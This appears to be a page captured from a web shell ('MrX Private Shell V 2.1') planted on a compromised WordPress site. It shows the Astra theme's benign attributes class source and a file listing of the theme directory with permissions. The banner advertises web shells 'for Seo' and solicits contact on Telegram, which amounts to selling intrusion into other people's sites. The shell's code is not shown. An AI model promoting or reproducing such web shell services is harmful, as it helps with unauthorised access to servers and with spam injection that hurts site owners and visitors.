__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Astra Attributes Class.
*
* @package Astra
* @link https://wpastra.com/
* @since Astra 1.6.2
*/
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
if ( ! class_exists( 'Astra_Attr' ) ) {
/**
* Class Astra_Attr
*/
class Astra_Attr {
/**
* Store Instance on Current Class.
*
* @var object instance
*/
private static $instance;
/**
* Initiator
*/
public static function get_instance() {
if ( ! isset( self::$instance ) ) {
self::$instance = new self();
}
return self::$instance;
}
/**
* Initialuze the Class.
*
* @since 1.6.2
*/
private function __construct() {
}
/**
* Build list of attributes into a string and apply contextual filter on string.
*
* The contextual filter is of the form `astra_attr_{context}_output`.
*
* @since 1.6.2
*
* @param string $context The context, to build filter name.
* @param array $attributes Optional. Extra attributes to merge with defaults.
* @param array $args Optional. Custom data to pass to filter.
* @return string String of HTML attributes and values.
*/
public function astra_attr( $context, $attributes = array(), $args = array() ) {
$attributes = $this->astra_parse_attr( $context, $attributes, $args );
$output = '';
// Cycle through attributes, build tag attribute string.
foreach ( $attributes as $key => $value ) {
if ( ! $value ) {
continue;
}
if ( true === $value ) {
$output .= esc_html( $key ) . ' ';
} else {
$output .= sprintf( '%s="%s" ', esc_html( $key ), esc_attr( $value ) );
}
}
$output = apply_filters( "astra_attr_{$context}_output", $output, $attributes, $context, $args );
return trim( $output );
}
/**
* Merge array of attributes with defaults, and apply contextual filter on array.
*
* The contextual filter is of the form `astra_attr_{context}`.
*
* @since 1.6.2
*
* @param string $context The context, to build filter name.
* @param array $attributes Optional. Extra attributes to merge with defaults.
* @param array $args Optional. Custom data to pass to filter.
* @return array Merged and filtered attributes.
*/
public function astra_parse_attr( $context, $attributes = array(), $args = array() ) {
$defaults = array(
'class' => sanitize_html_class( $context ),
);
$attributes = wp_parse_args( $attributes, $defaults );
// Contextual filter.
return apply_filters( "astra_attr_{$context}", $attributes, $context, $args );
}
}
}
/**
* Kicking this off by calling 'get_instance()' method
*/
Astra_Attr::get_instance();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| builder | Folder | 0750 |
|
|
| deprecated | Folder | 0750 |
|
|
| markup | Folder | 0750 |
|
|
| class-astra-admin-helper.php | File | 2.07 KB | 0640 |
|
| class-astra-admin-settings.php | File | 24.7 KB | 0640 |
|
| class-astra-attr.php | File | 2.64 KB | 0640 |
|
| class-astra-enqueue-scripts.php | File | 25.26 KB | 0640 |
|
| class-astra-icons.php | File | 12.08 KB | 0640 |
|
| class-astra-theme-options.php | File | 34.5 KB | 0640 |
|
| class-astra-walker-page.php | File | 4.6 KB | 0640 |
|
| class-astra-wp-editor-css.php | File | 64.12 KB | 0640 |
|
| class-gutenberg-editor-css.php | File | 78.8 KB | 0640 |
|
| class-theme-strings.php | File | 5.08 KB | 0640 |
|
| common-functions.php | File | 66.53 KB | 0640 |
|
| index.php | File | 111 B | 0640 |
|
| sidebar-manager.php | File | 2.2 KB | 0640 |
|
| theme-hooks.php | File | 8.94 KB | 0640 |
|